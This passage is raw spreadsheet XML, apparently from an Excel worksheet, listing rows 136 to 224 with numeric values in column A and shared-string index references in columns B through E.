      <c r="C136" s="103" t="s">
        <v>711</v>
      </c>
      <c r="D136" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E136" s="105" t="s">
        <v>3287</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="106">
        <v>163.0</v>
      </c>
      <c r="B137" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C137" s="108" t="s">
        <v>714</v>
      </c>
      <c r="D137" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E137" s="110" t="s">
        <v>3288</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="101">
        <v>282.0</v>
      </c>
      <c r="B138" s="102" t="s">
        <v>29</v>
      </c>
      <c r="C138" s="103" t="s">
        <v>717</v>
      </c>
      <c r="D138" s="104" t="s">
        <v>3046</v>
      </c>
      <c r="E138" s="105" t="s">
        <v>3289</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="106">
        <v>295.0</v>
      </c>
      <c r="B139" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C139" s="108" t="s">
        <v>720</v>
      </c>
      <c r="D139" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E139" s="110" t="s">
        <v>3290</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="101">
        <v>298.0</v>
      </c>
      <c r="B140" s="102" t="s">
        <v>29</v>
      </c>
      <c r="C140" s="103" t="s">
        <v>723</v>
      </c>
      <c r="D140" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E140" s="105" t="s">
        <v>3291</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="106">
        <v>323.0</v>
      </c>
      <c r="B141" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C141" s="108" t="s">
        <v>726</v>
      </c>
      <c r="D141" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E141" s="110" t="s">
        <v>3292</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="101">
        <v>346.0</v>
      </c>
      <c r="B142" s="102" t="s">
        <v>29</v>
      </c>
      <c r="C142" s="103" t="s">
        <v>729</v>
      </c>
      <c r="D142" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E142" s="105" t="s">
        <v>3293</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="106">
        <v>117680.0</v>
      </c>
      <c r="B143" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C143" s="108" t="s">
        <v>742</v>
      </c>
      <c r="D143" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E143" s="110" t="s">
        <v>3294</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="101">
        <v>118320.0</v>
      </c>
      <c r="B144" s="102" t="s">
        <v>31</v>
      </c>
      <c r="C144" s="103" t="s">
        <v>763</v>
      </c>
      <c r="D144" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E144" s="105" t="s">
        <v>3295</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="106">
        <v>121443.0</v>
      </c>
      <c r="B145" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C145" s="108" t="s">
        <v>821</v>
      </c>
      <c r="D145" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E145" s="110" t="s">
        <v>3296</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="101">
        <v>121913.0</v>
      </c>
      <c r="B146" s="102" t="s">
        <v>31</v>
      </c>
      <c r="C146" s="103" t="s">
        <v>839</v>
      </c>
      <c r="D146" s="104" t="s">
        <v>3046</v>
      </c>
      <c r="E146" s="105" t="s">
        <v>3297</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="106">
        <v>123661.0</v>
      </c>
      <c r="B147" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C147" s="108" t="s">
        <v>878</v>
      </c>
      <c r="D147" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E147" s="110" t="s">
        <v>3298</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="101">
        <v>123729.0</v>
      </c>
      <c r="B148" s="102" t="s">
        <v>31</v>
      </c>
      <c r="C148" s="103" t="s">
        <v>881</v>
      </c>
      <c r="D148" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E148" s="105" t="s">
        <v>3299</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="106">
        <v>126156.0</v>
      </c>
      <c r="B149" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C149" s="108" t="s">
        <v>887</v>
      </c>
      <c r="D149" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E149" s="110" t="s">
        <v>3300</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="101">
        <v>126275.0</v>
      </c>
      <c r="B150" s="102" t="s">
        <v>31</v>
      </c>
      <c r="C150" s="103" t="s">
        <v>890</v>
      </c>
      <c r="D150" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E150" s="105" t="s">
        <v>3301</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="106">
        <v>126709.0</v>
      </c>
      <c r="B151" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C151" s="108" t="s">
        <v>895</v>
      </c>
      <c r="D151" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E151" s="110" t="s">
        <v>3302</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="101">
        <v>36.0</v>
      </c>
      <c r="B152" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C152" s="103" t="s">
        <v>898</v>
      </c>
      <c r="D152" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E152" s="105" t="s">
        <v>3303</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="106">
        <v>45.0</v>
      </c>
      <c r="B153" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C153" s="108" t="s">
        <v>901</v>
      </c>
      <c r="D153" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E153" s="110" t="s">
        <v>3304</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="101">
        <v>52.0</v>
      </c>
      <c r="B154" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C154" s="103" t="s">
        <v>904</v>
      </c>
      <c r="D154" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E154" s="105" t="s">
        <v>3305</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="106">
        <v>60.0</v>
      </c>
      <c r="B155" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C155" s="108" t="s">
        <v>907</v>
      </c>
      <c r="D155" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E155" s="110" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="101">
        <v>153.0</v>
      </c>
      <c r="B156" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C156" s="103" t="s">
        <v>913</v>
      </c>
      <c r="D156" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E156" s="105" t="s">
        <v>3307</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="106">
        <v>178.0</v>
      </c>
      <c r="B157" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C157" s="108" t="s">
        <v>918</v>
      </c>
      <c r="D157" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E157" s="110" t="s">
        <v>3308</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="101">
        <v>182.0</v>
      </c>
      <c r="B158" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C158" s="103" t="s">
        <v>921</v>
      </c>
      <c r="D158" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E158" s="105" t="s">
        <v>3309</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="106">
        <v>183.0</v>
      </c>
      <c r="B159" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C159" s="108" t="s">
        <v>924</v>
      </c>
      <c r="D159" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E159" s="110" t="s">
        <v>3310</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="101">
        <v>133.0</v>
      </c>
      <c r="B160" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C160" s="103" t="s">
        <v>929</v>
      </c>
      <c r="D160" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E160" s="105" t="s">
        <v>3311</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="106">
        <v>268.0</v>
      </c>
      <c r="B161" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C161" s="108" t="s">
        <v>935</v>
      </c>
      <c r="D161" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E161" s="110" t="s">
        <v>3312</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="101">
        <v>280.0</v>
      </c>
      <c r="B162" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C162" s="103" t="s">
        <v>938</v>
      </c>
      <c r="D162" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E162" s="105" t="s">
        <v>3313</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="106">
        <v>456.0</v>
      </c>
      <c r="B163" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C163" s="108" t="s">
        <v>941</v>
      </c>
      <c r="D163" s="109" t="s">
        <v>2960</v>
      </c>
      <c r="E163" s="110" t="s">
        <v>3314</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="101">
        <v>510.0</v>
      </c>
      <c r="B164" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C164" s="103" t="s">
        <v>946</v>
      </c>
      <c r="D164" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E164" s="105" t="s">
        <v>3315</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="106">
        <v>575.0</v>
      </c>
      <c r="B165" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C165" s="108" t="s">
        <v>949</v>
      </c>
      <c r="D165" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E165" s="110" t="s">
        <v>3316</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="101">
        <v>1300.0</v>
      </c>
      <c r="B166" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C166" s="103" t="s">
        <v>958</v>
      </c>
      <c r="D166" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E166" s="105" t="s">
        <v>3317</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="106">
        <v>1437.0</v>
      </c>
      <c r="B167" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C167" s="108" t="s">
        <v>961</v>
      </c>
      <c r="D167" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E167" s="110" t="s">
        <v>3318</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="101">
        <v>1479.0</v>
      </c>
      <c r="B168" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C168" s="103" t="s">
        <v>964</v>
      </c>
      <c r="D168" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E168" s="105" t="s">
        <v>3319</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="106">
        <v>1511.0</v>
      </c>
      <c r="B169" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C169" s="108" t="s">
        <v>967</v>
      </c>
      <c r="D169" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E169" s="110" t="s">
        <v>3320</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="101">
        <v>1532.0</v>
      </c>
      <c r="B170" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C170" s="103" t="s">
        <v>970</v>
      </c>
      <c r="D170" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E170" s="105" t="s">
        <v>3321</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="106">
        <v>1626.0</v>
      </c>
      <c r="B171" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C171" s="108" t="s">
        <v>973</v>
      </c>
      <c r="D171" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E171" s="110" t="s">
        <v>3322</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="101">
        <v>1638.0</v>
      </c>
      <c r="B172" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C172" s="103" t="s">
        <v>976</v>
      </c>
      <c r="D172" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E172" s="105" t="s">
        <v>3323</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="106">
        <v>1878.0</v>
      </c>
      <c r="B173" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C173" s="108" t="s">
        <v>979</v>
      </c>
      <c r="D173" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E173" s="110" t="s">
        <v>3324</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="101">
        <v>1915.0</v>
      </c>
      <c r="B174" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C174" s="103" t="s">
        <v>982</v>
      </c>
      <c r="D174" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E174" s="105" t="s">
        <v>3325</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="106">
        <v>1939.0</v>
      </c>
      <c r="B175" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C175" s="108" t="s">
        <v>985</v>
      </c>
      <c r="D175" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E175" s="110" t="s">
        <v>3326</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="101">
        <v>2584.0</v>
      </c>
      <c r="B176" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C176" s="103" t="s">
        <v>994</v>
      </c>
      <c r="D176" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E176" s="105" t="s">
        <v>3327</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="106">
        <v>3003.0</v>
      </c>
      <c r="B177" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C177" s="108" t="s">
        <v>997</v>
      </c>
      <c r="D177" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E177" s="110" t="s">
        <v>3328</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="101">
        <v>3536.0</v>
      </c>
      <c r="B178" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C178" s="103" t="s">
        <v>1006</v>
      </c>
      <c r="D178" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E178" s="105" t="s">
        <v>3329</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="106">
        <v>3827.0</v>
      </c>
      <c r="B179" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C179" s="108" t="s">
        <v>1012</v>
      </c>
      <c r="D179" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E179" s="110" t="s">
        <v>3330</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="101">
        <v>3856.0</v>
      </c>
      <c r="B180" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C180" s="103" t="s">
        <v>1015</v>
      </c>
      <c r="D180" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E180" s="105" t="s">
        <v>3331</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="106">
        <v>14508.0</v>
      </c>
      <c r="B181" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C181" s="108" t="s">
        <v>1018</v>
      </c>
      <c r="D181" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E181" s="110" t="s">
        <v>3332</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="101">
        <v>14980.0</v>
      </c>
      <c r="B182" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C182" s="103" t="s">
        <v>1022</v>
      </c>
      <c r="D182" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E182" s="105" t="s">
        <v>3333</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="106">
        <v>14983.0</v>
      </c>
      <c r="B183" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C183" s="108" t="s">
        <v>1028</v>
      </c>
      <c r="D183" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E183" s="110" t="s">
        <v>3334</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="101">
        <v>15007.0</v>
      </c>
      <c r="B184" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C184" s="103" t="s">
        <v>1031</v>
      </c>
      <c r="D184" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E184" s="105" t="s">
        <v>3335</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="106">
        <v>15252.0</v>
      </c>
      <c r="B185" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C185" s="108" t="s">
        <v>1034</v>
      </c>
      <c r="D185" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E185" s="110" t="s">
        <v>3336</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="101">
        <v>15291.0</v>
      </c>
      <c r="B186" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C186" s="103" t="s">
        <v>1037</v>
      </c>
      <c r="D186" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E186" s="105" t="s">
        <v>3337</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="106">
        <v>15608.0</v>
      </c>
      <c r="B187" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C187" s="108" t="s">
        <v>1049</v>
      </c>
      <c r="D187" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E187" s="110" t="s">
        <v>3338</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="101">
        <v>15931.0</v>
      </c>
      <c r="B188" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C188" s="103" t="s">
        <v>1052</v>
      </c>
      <c r="D188" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E188" s="105" t="s">
        <v>3339</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="106">
        <v>16048.0</v>
      </c>
      <c r="B189" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C189" s="108" t="s">
        <v>1056</v>
      </c>
      <c r="D189" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E189" s="110" t="s">
        <v>3340</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="101">
        <v>16748.0</v>
      </c>
      <c r="B190" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C190" s="103" t="s">
        <v>1059</v>
      </c>
      <c r="D190" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E190" s="105" t="s">
        <v>3341</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="106">
        <v>20133.0</v>
      </c>
      <c r="B191" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C191" s="108" t="s">
        <v>1062</v>
      </c>
      <c r="D191" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E191" s="110" t="s">
        <v>3342</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="101">
        <v>20445.0</v>
      </c>
      <c r="B192" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C192" s="103" t="s">
        <v>1065</v>
      </c>
      <c r="D192" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E192" s="105" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="106">
        <v>20634.0</v>
      </c>
      <c r="B193" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C193" s="108" t="s">
        <v>1068</v>
      </c>
      <c r="D193" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E193" s="110" t="s">
        <v>3344</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="101">
        <v>21123.0</v>
      </c>
      <c r="B194" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C194" s="103" t="s">
        <v>1071</v>
      </c>
      <c r="D194" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E194" s="105" t="s">
        <v>3345</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="106">
        <v>22023.0</v>
      </c>
      <c r="B195" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C195" s="108" t="s">
        <v>1074</v>
      </c>
      <c r="D195" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E195" s="110" t="s">
        <v>3346</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="101">
        <v>22328.0</v>
      </c>
      <c r="B196" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C196" s="103" t="s">
        <v>1077</v>
      </c>
      <c r="D196" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E196" s="105" t="s">
        <v>3347</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="106">
        <v>18.0</v>
      </c>
      <c r="B197" s="107" t="s">
        <v>39</v>
      </c>
      <c r="C197" s="108" t="s">
        <v>1083</v>
      </c>
      <c r="D197" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E197" s="110" t="s">
        <v>3348</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="101">
        <v>443.0</v>
      </c>
      <c r="B198" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C198" s="103" t="s">
        <v>1113</v>
      </c>
      <c r="D198" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E198" s="105" t="s">
        <v>3349</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="106">
        <v>474.0</v>
      </c>
      <c r="B199" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C199" s="108" t="s">
        <v>1116</v>
      </c>
      <c r="D199" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E199" s="110" t="s">
        <v>3350</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="101">
        <v>481.0</v>
      </c>
      <c r="B200" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C200" s="103" t="s">
        <v>1122</v>
      </c>
      <c r="D200" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E200" s="105" t="s">
        <v>3351</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="106">
        <v>495.0</v>
      </c>
      <c r="B201" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C201" s="108" t="s">
        <v>1125</v>
      </c>
      <c r="D201" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E201" s="110" t="s">
        <v>3352</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="101">
        <v>512.0</v>
      </c>
      <c r="B202" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C202" s="103" t="s">
        <v>1128</v>
      </c>
      <c r="D202" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E202" s="105" t="s">
        <v>3353</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="106">
        <v>525.0</v>
      </c>
      <c r="B203" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C203" s="108" t="s">
        <v>1131</v>
      </c>
      <c r="D203" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E203" s="110" t="s">
        <v>3354</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="101">
        <v>557.0</v>
      </c>
      <c r="B204" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C204" s="103" t="s">
        <v>1134</v>
      </c>
      <c r="D204" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E204" s="105" t="s">
        <v>3355</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="106">
        <v>637.0</v>
      </c>
      <c r="B205" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C205" s="108" t="s">
        <v>1137</v>
      </c>
      <c r="D205" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E205" s="110" t="s">
        <v>3356</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="101">
        <v>652.0</v>
      </c>
      <c r="B206" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C206" s="103" t="s">
        <v>1143</v>
      </c>
      <c r="D206" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E206" s="105" t="s">
        <v>3357</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="106">
        <v>660.0</v>
      </c>
      <c r="B207" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C207" s="108" t="s">
        <v>1146</v>
      </c>
      <c r="D207" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E207" s="110" t="s">
        <v>3358</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="101">
        <v>738.0</v>
      </c>
      <c r="B208" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C208" s="103" t="s">
        <v>1149</v>
      </c>
      <c r="D208" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E208" s="105" t="s">
        <v>3359</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="106">
        <v>779.0</v>
      </c>
      <c r="B209" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C209" s="108" t="s">
        <v>1152</v>
      </c>
      <c r="D209" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E209" s="110" t="s">
        <v>3360</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="101">
        <v>914.0</v>
      </c>
      <c r="B210" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C210" s="103" t="s">
        <v>1158</v>
      </c>
      <c r="D210" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E210" s="105" t="s">
        <v>3361</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="106">
        <v>942.0</v>
      </c>
      <c r="B211" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C211" s="108" t="s">
        <v>1164</v>
      </c>
      <c r="D211" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E211" s="110" t="s">
        <v>3362</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="101">
        <v>983.0</v>
      </c>
      <c r="B212" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C212" s="103" t="s">
        <v>1170</v>
      </c>
      <c r="D212" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E212" s="105" t="s">
        <v>3363</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="106">
        <v>1005.0</v>
      </c>
      <c r="B213" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C213" s="108" t="s">
        <v>1176</v>
      </c>
      <c r="D213" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E213" s="110" t="s">
        <v>3364</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="101">
        <v>1022.0</v>
      </c>
      <c r="B214" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C214" s="103" t="s">
        <v>1179</v>
      </c>
      <c r="D214" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E214" s="105" t="s">
        <v>3365</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="106">
        <v>1086.0</v>
      </c>
      <c r="B215" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C215" s="108" t="s">
        <v>1182</v>
      </c>
      <c r="D215" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E215" s="110" t="s">
        <v>3366</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="101">
        <v>1173.0</v>
      </c>
      <c r="B216" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C216" s="103" t="s">
        <v>1185</v>
      </c>
      <c r="D216" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E216" s="105" t="s">
        <v>3367</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="106">
        <v>1198.0</v>
      </c>
      <c r="B217" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C217" s="108" t="s">
        <v>1197</v>
      </c>
      <c r="D217" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E217" s="110" t="s">
        <v>3368</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="101">
        <v>1280.0</v>
      </c>
      <c r="B218" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C218" s="103" t="s">
        <v>1203</v>
      </c>
      <c r="D218" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E218" s="105" t="s">
        <v>3369</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="106">
        <v>1701.0</v>
      </c>
      <c r="B219" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C219" s="108" t="s">
        <v>1206</v>
      </c>
      <c r="D219" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E219" s="110" t="s">
        <v>3370</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="101">
        <v>1775.0</v>
      </c>
      <c r="B220" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C220" s="103" t="s">
        <v>1209</v>
      </c>
      <c r="D220" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E220" s="105" t="s">
        <v>3371</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="106">
        <v>2010.0</v>
      </c>
      <c r="B221" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C221" s="108" t="s">
        <v>1212</v>
      </c>
      <c r="D221" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E221" s="110" t="s">
        <v>3372</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="101">
        <v>2154.0</v>
      </c>
      <c r="B222" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C222" s="103" t="s">
        <v>1218</v>
      </c>
      <c r="D222" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E222" s="105" t="s">
        <v>3373</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="106">
        <v>2251.0</v>
      </c>
      <c r="B223" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C223" s="108" t="s">
        <v>1224</v>
      </c>
      <c r="D223" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E223" s="110" t="s">
        <v>3374</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="101">
        <v>2524.0</v>
      </c>
      <c r="B224" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C224" s="103" t="s">
        <v>1230</v>
      </c>
      <c r="D224" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E224" s="105" t="s">
        <v>3375</v>
      </c>
    </row>
    <row r="225">
